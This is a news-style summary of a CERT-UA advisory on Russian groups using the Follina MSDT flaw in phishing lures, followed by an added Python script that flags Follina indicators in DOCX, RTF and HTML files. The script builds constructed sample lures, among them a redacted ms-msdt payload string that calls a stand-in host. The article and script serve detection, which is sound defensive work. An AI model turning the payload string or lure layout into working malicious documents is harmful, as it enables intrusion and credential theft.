CERT-UA, the Computer Emergency Response Team of Ukraine, has released a threat advisory on two Russian threat groups exploiting the Follina vulnerability (CVE-2022-30190, a remote code execution flaw in the Microsoft Support Diagnostic Tool, MSDT) in their phishing campaigns.
The two groups observed targeting Ukraine are APT28 and UAC-0098. APT28's lures drop the CredoMap credential stealer, while UAC-0098's lures fetch a Cobalt Strike Beacon.
APT28 (also tracked as Fancy Bear) was seen sending emails with a malicious attachment that plays on Ukrainians' fear of a Russian nuclear attack.
The attachment, an RTF document titled “Nuclear Terrorism A Very Real Threat”, exploits Follina to download and run the CredoMap malware on the victim's machine.
CredoMap harvests credentials saved in web browsers, including Chrome, Microsoft Edge, and Mozilla Firefox; the researchers noted that it also collects the cookies stored by these browsers.
The attackers continue to exploit Follina even though Microsoft shipped a patch for it in June 2022.
CERT-UA also attributed a separate campaign to another group, UAC-0098, which likewise relies on Follina.
Its lure is a DOCX named “Imposition of penalties[.]docx”; when opened, the document fetches a Cobalt Strike Beacon from a remote resource. The retrieved Beacon carries a June compilation timestamp.
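Both lures above share the Follina delivery mechanism: an Office document carries an OLE object whose target is a remote HTML page rather than an embedded part, and that page invokes the `ms-msdt:` protocol handler. The script below is an added triage example, not code from CERT-UA or from the analysed samples. It checks a DOCX for external oleObject relationships, hex-decodes the `\objdata` blobs of an RTF to recover embedded URLs, and flags `ms-msdt:` URIs in fetched HTML. The host `example.invalid`, the file names, the `REDACTED` parameter value and the embedded sample documents are all constructed for the demonstration; the real malicious documents and their C2 hosts are not reproduced.

```python
"""Added triage checks for Follina (CVE-2022-30190) lures. Not part of the
CERT-UA advisory; all sample documents and hosts below are constructed."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
MSDT_URI_RE = re.compile("ms-msdt:[^\"'<]*", re.IGNORECASE)   # up to the closing quote
OBJDATA_RE = re.compile(r"\\objdata\s*([0-9a-fA-F\s]+)")      # hex blob of an RTF object
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")


def external_ole_targets(docx_bytes):
    """DOCX check: (rels part, Target) for every oleObject relationship whose
    TargetMode is External. A normal embedded object is Internal (its default
    per OPC) and points at a part inside the zip; an External http(s) target
    is how a Follina lure pulls its remote HTML stage."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if (rel.get("Type") == OLE_REL_TYPE
                        and rel.get("TargetMode", "Internal") == "External"):
                    hits.append((name, rel.get("Target")))
    return hits


def rtf_object_urls(rtf_text):
    """RTF check: hex-decode every \\objdata blob and extract http(s) URLs
    stored either as ASCII or as UTF-16LE (the encoding URL monikers use)."""
    found = {}
    for hexblob in OBJDATA_RE.findall(rtf_text):
        hexstr = re.sub(r"\s+", "", hexblob)
        raw = bytes.fromhex(hexstr[: len(hexstr) // 2 * 2])
        views = [raw] + [raw[off:].decode("utf-16-le", "ignore").encode("ascii", "ignore")
                         for off in (0, 1)]          # both UTF-16 alignments
        for view in views:
            for m in URL_RE.findall(view):
                found.setdefault(m.decode(), None)
    return list(found)


def msdt_uris(html_text):
    """HTML check: every ms-msdt: protocol handler invocation in the page."""
    return MSDT_URI_RE.findall(html_text)


def build_sample_docx(external):
    """Constructed minimal DOCX. external=True mimics the lure layout (remote
    HTML target with the trailing '!' seen in public proof-of-concept files);
    external=False mimics a benign embedded object."""
    if external:
        rel = (f'<Relationship Id="rId1" Type="{OLE_REL_TYPE}" '
               'Target="http://example.invalid/lure.html!" TargetMode="External"/>')
    else:
        rel = (f'<Relationship Id="rId1" Type="{OLE_REL_TYPE}" '
               'Target="embeddings/oleObject1.bin"/>')
    rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{RELS_NS}">{rel}</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        zf.writestr("word/document.xml", '<?xml version="1.0"?><document/>')
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


def build_sample_rtf():
    """Constructed RTF whose \\objdata carries a UTF-16LE URL behind a few
    dummy header bytes (not a real OLE stream)."""
    stream = (b"\x01\x05\x00\x00\x02\x00\x00\x00"
              + "http://example.invalid/lure.html".encode("utf-16-le") + b"\x00\x00")
    return "{\\rtf1\\ansi{\\object\\objautlink\\objupdate{\\*\\objdata " + stream.hex() + "}}}"


SAMPLE_HTML = (  # constructed stand-in for the remote HTML stage
    "<!doctype html><html><body><script>\n"
    'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force '
    '/param IT_LaunchMethod=ContextMenu IT_BrowseForFile=REDACTED";\n'
    "</script></body></html>"
)

if __name__ == "__main__":
    print("docx external OLE:", external_ole_targets(build_sample_docx(external=True)))
    print("docx benign:      ", external_ole_targets(build_sample_docx(external=False)))
    print("rtf object URLs:  ", rtf_object_urls(build_sample_rtf()))
    print("ms-msdt URIs:     ", msdt_uris(SAMPLE_HTML))
```

An external oleObject relationship also occurs in legitimately linked objects, so treat a hit as a triage signal that warrants fetching and inspecting the target (in a sandbox), not as a verdict; the `ms-msdt:` check on the fetched page is what confirms the Follina chain.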
The phishing emails impersonate the State Tax Service of Ukraine and use a subject line about taxes left unpaid because of the war, a theme that applies to most Ukrainians affected by the Russian invasion and so widens the pool of plausible targets.
Russian threat actors have targeted Ukrainian entities across the board since the war began, and their quick adoption of newly published exploits such as Follina shows a continuing effort to make their attacks more effective.
Security researchers expect further attacks from Russian state-sponsored groups. CERT-UA advises Ukrainian organizations and citizens to stay alert for malware-laden attachments and, since exploitation continues after the fix, to apply Microsoft's patch for CVE-2022-30190.